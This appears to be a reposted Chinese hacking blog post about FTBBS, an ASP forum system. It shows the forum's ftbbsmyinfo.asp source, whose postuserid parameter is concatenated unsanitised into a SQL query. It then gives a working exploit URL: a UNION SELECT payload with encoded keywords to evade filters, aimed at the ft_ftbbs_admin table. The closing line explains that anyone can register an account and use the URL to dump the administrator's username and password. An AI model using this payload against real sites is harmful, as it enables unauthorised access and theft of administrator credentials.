摘自:cool kid's blog
conn.asp木有做好防注入,
ftbbsmyinfo.asp里又JB来一注入,绝配..
贴上ftbbsmyinfo.asp源码:
ASP/Visual Basic代码
01.<%
02.postuserid=request.QueryString(”postuserid”)
03.ftbbsuser=request.QueryString(”ftbbsuser”)
04.call FTBBS_HTML_MB(ft)
05.defaulthome=Application(”FTBBSMB”)(31,0)
06.if defaulthome=1 then
07.homepage=”ftbbshome.asp”
08.else
09.homepage=”main.asp”
10.end if
11.if postuserid=”" then
12.sql=”select clubuser_id,clubuser_name,payuser,clubuser_money,
13.userimg,clubuser_email,clubuser_address,clubuser_reg_date,
14.clubuser_enter_count,clubuser_sex,clubuser_marriage,
15.clubuser_lasttime,signname,postnum,tili,jingyuan from “&ft&”clubuser where clubuser_name=’”&ftbbsuser&”‘”
16.else
17.sql=”select clubuser_id,clubuser_name,payuser,clubuser_money,
18.userimg,clubuser_email,clubuser_address,clubuser_reg_date,
19.clubuser_enter_count,clubuser_sex,clubuser_marriage,
20.clubuser_lasttime,signname,postnum,tili,jingyuan from “&ft&”clubuser where clubuser_id=”&postuserid
21.end if
22.set rsx=server.createobject(”adodb.recordset”)
23.rsx.open sql,conn,3,1
24.if not rsx.eof then
25.clubuser_id=rsx(”clubuser_id”)
26.clubuser_name=rsx(”clubuser_name”)
27.payuser=rsx(”payuser”)
28.userimg=rsx(”userimg”)
29.clubuser_money=rsx(”clubuser_money”)
30.clubuser_email=rsx(”clubuser_email”)
31.clubuser_address=rsx(”clubuser_address”)
32.clubuser_reg_date=rsx(”clubuser_reg_date”)
33.clubuser_enter_count=rsx(”clubuser_enter_count”)
34.clubuser_sex=rsx(”clubuser_sex”)
35.clubuser_marriage=rsx(”clubuser_marriage”)
36.clubuser_lasttime=rsx(”clubuser_lasttime”)
37.signname=ftbbsubbcode(rsx(”signname”))
38.postnum=rsx(”postnum”)
39.jingyuan=rsx(”jingyuan”)
40.tili=rsx(”tili”)
41.end if
42.rsx.close
43.set rsx=nothing
44.touxian=touxianvalue(jingyuan,ft)
45.jibie=replace(jibievalue(jingyuan,ft),”../”,”")
46.%>
利用代码如下:
http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%
201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin
灰常的 ,注册个账号然后利用上面的代码直接爆管理员账号密码.